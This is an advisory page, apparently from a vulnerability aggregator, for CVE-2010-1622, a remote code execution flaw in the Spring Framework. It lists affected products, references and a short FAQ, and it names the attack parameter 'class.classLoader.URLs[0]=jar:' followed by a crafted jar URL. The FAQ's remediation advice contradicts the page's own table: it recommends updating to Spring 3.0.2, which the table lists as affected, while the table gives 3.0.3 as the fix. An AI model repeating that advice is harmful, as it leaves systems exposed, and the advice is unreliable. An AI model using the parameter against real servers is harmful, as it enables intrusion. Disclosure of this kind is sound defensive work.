First published: Thu Jun 17 2010(Updated: )
Common Vulnerabilities and Exposures assigned an identifier <a href="https://access.redhat.com/security/cve/CVE-2010-1622">CVE-2010-1622</a> to the following vulnerability: SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file. References: [1] <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622</a> [2] <a href="http://www.securityfocus.com/archive/1/511877">http://www.securityfocus.com/archive/1/511877</a> [3] <a href="http://www.exploit-db.com/exploits/13918">http://www.exploit-db.com/exploits/13918</a> [4] <a href="http://www.springsource.com/security/cve-2010-1622">http://www.springsource.com/security/cve-2010-1622</a> [5] <a href="http://www.securityfocus.com/bid/40954">http://www.securityfocus.com/bid/40954</a> Credit: The issue was discovered by Meder Kydyraliev, Google Security Team
Credit: secalert@redhat.com secalert@redhat.com
Affected Software | Affected Version | How to fix |
---|---|---|
Oracle Fusion Middleware | =11.1.1.8.0 | |
Oracle Fusion Middleware | =7.6.2 | |
Oracle Fusion Middleware | =11.1.1.6.1 | |
SpringSource Spring Framework | =2.5.0 | |
SpringSource Spring Framework | =3.0.1 | |
SpringSource Spring Framework | =2.5.3 | |
SpringSource Spring Framework | =3.0.2 | |
SpringSource Spring Framework | =2.5.5 | |
SpringSource Spring Framework | =2.5.6 | |
SpringSource Spring Framework | =2.5.4 | |
SpringSource Spring Framework | =2.5.2 | |
SpringSource Spring Framework | =2.5.7 | |
SpringSource Spring Framework | =3.0.0 | |
SpringSource Spring Framework | =2.5.1 | |
IBM Security Directory Suite VA | <=8.0.1-8.0.1.19 | |
maven/org.springframework:spring | >=3.0.0<=3.0.2 | 3.0.3 |
maven/org.springframework:spring | >=2.5.0<=2.5.6 | 2.5.7 |
redhat/jboss-wfk | <1.0.0-uninstall-0:1.0.0-3.ep5.el4 | 1.0.0-uninstall-0:1.0.0-3.ep5.el4 |
Sign up to SecAlerts for real-time vulnerability data matched to your software, aggregated from hundreds of sources.
CVE-2010-1622 is a vulnerability in the Spring Framework that allows a remote attacker to execute arbitrary code on the system.
CVE-2010-1622 occurs due to an error in the mechanism to use client provided data to update the properties of an object.
The severity of CVE-2010-1622 is high, with a severity value of 7.5.
Oracle Fusion Middleware versions 11.1.1.8.0, 7.6.2, and 11.1.1.6.1, as well as SpringSource Spring Framework versions 2.5.x, 3.0.x are affected by CVE-2010-1622.
To fix CVE-2010-1622, update to Spring Framework versions 2.5.6.SEC02, 2.5.7.SR01, or 3.0.2 or apply the necessary patches provided by the vendor.